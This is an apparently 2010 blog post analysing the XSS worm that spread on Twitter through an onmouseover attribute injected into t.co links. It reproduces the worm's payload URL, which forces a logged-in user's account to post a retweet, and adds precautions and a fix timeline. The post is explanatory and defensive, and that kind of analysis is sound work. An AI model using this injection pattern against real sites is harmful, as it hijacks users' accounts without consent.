XSS Worm Spreads on Twitter

Today I just logged into my Twitter account few minutes ago and it was visible at the top of the page a suspicious javascript code that looks like the one in this image:

Image

After a small analysis, I noticed that if you login to your twitter account and you put your mouse pointer over a link you will activate the javascript code that will retweet a specific Twitter account named “Matsta”. From the following image you can see an example of a retweet done after the mouse pointer has been moved over a link (yes, I did that too… doh!):

Image

The extracted code is this:

http://t.co/@%22onmouseover=%22document.getElementById(%27status%27).value=%27RT%20Matsta%27;$(%27.status-update-form%27).submit();%22class=%22modal-overlay%22/

We can extract useful strings for the above code:

onmouseover=

To activate the code is needed you move your mouse pointer over a link.

value='RT Matsta'

When you move your mouse pointer over a link and you are logged into your Twitter account, your account will post a new RT (ReTweet) that points to a link to the Twitter account of the user “Matsta”, as seen in this picture:

Image

Precautions

The XSS attack, to work correctly, needs that you have javascript enabled in your browser, so a very basic prevenction trick would be to disable javascript in your browser and it can be done easily with NoScript Add-On. We also recommend to not login to Twitter until the XSS vulnerability has been completely fixed.

Unwanted ReTweets

If you have the suspicious retweets in your Twitter account, you can simply login to Twitter later when the XSS has been fixed and you can remove the unwanted retweets manually.

Status

21/09/2010 @ 15:35 PM GMT+1 = XSS Worm is still live
21/09/2010 @ 16:20 PM GMT+1 = PROBLEM HAS BEEN FIXED

http://twitter.com/safety:

The XSS attack should now be fully patched and no longer exploitable.

Change Password

I would advice anyone that used Twitter during the XSS attack to change their password with a stronger password.